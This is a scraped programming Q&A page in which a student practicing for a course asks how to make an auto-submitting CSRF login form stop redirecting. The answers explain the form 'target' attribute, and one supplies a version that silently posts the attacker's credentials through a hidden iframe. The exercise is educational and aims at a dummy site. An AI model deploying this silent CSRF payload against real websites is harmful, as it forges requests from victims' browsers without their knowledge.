Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

submitting a form through javascript without redirecting

Tags:

javascript

html

I'm practicing a CSRF attack for my course and I have to attack a dummy website by creating a "fake" page. I have the following code

csrf.html

<!DOCTYPE html>
<head>CSRF_ATTACK_PT1</head>
<body>
    <form name ='csrf_form' action='http://course_website/login' method="POST">
        <input type='hidden' name='username' value='attacker_id'>
        <input type='hidden' name='password' value='attacker_pw'>
    </form>
    <script>
        document.csrf_form.submit();
    </script>
</body>

The code above works perfectly, except that every time I open csrf.html it will also open up the course_website page. I just want it to remain on csrf.html and not redirect/ open up a new tab.

After looking through SO (I don't know much js..), I tried 

<script>
        document.csrf_form.submit(function(){
           return false;
        });
</script>

and adding a onsubmit = return false; to the form itself, but neither works.

What is the best thing to do here?

PS: not sure if this changes anything, but I used action as oppose to target in my form because one works and the other does not. Anything that I have to watch out for?

like image 339
user3277633 Avatar asked May 12 '26 18:05

user3277633

2 Answers

but I used action as oppose to target in my form because one works and the other does not

target and action do completely different things.

  • action specifies the URL to send the request to.
  • target specifies the frame to open the response to that request in

If you don't want to leave the current page, then you need to specify the target as a frame or new window. Omitting it was cause the new page to load in the current window and replace the document containing the form.

If it also possible to (kinda) submit forms without leaving the page by cancelling the form submission and then simulating it with JavaScript (generally via the XMLHttpRequest object) instead. A CSRF attack is going to be cross-origin though, so that approach will likely fail due to the Same Origin Policy).

like image 61
Quentin Avatar answered May 15 '26 06:05

Quentin

E.g. of the above answer in your code

<!DOCTYPE html>
<head>CSRF_ATTACK_PT1</head>
<body>
    <form name ='csrf_form' target='hiddenFrame' action='http://course_website/login' method="POST">
        <input type='hidden' name='username' value='attacker_id'>
        <input type='hidden' name='password' value='attacker_pw'>
    </form>
    <iframe name='hiddenFrame'  style='display:none'></iframe>
    <script>
        document.csrf_form.submit();
    </script>
</body>
like image 31
Answer Seeker Avatar answered May 15 '26 06:05

Answer Seeker

Sign in to Comment

Related questions

Re-arrange a flat array with level info into n-ary tree with childrens
how to pass variable in error

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!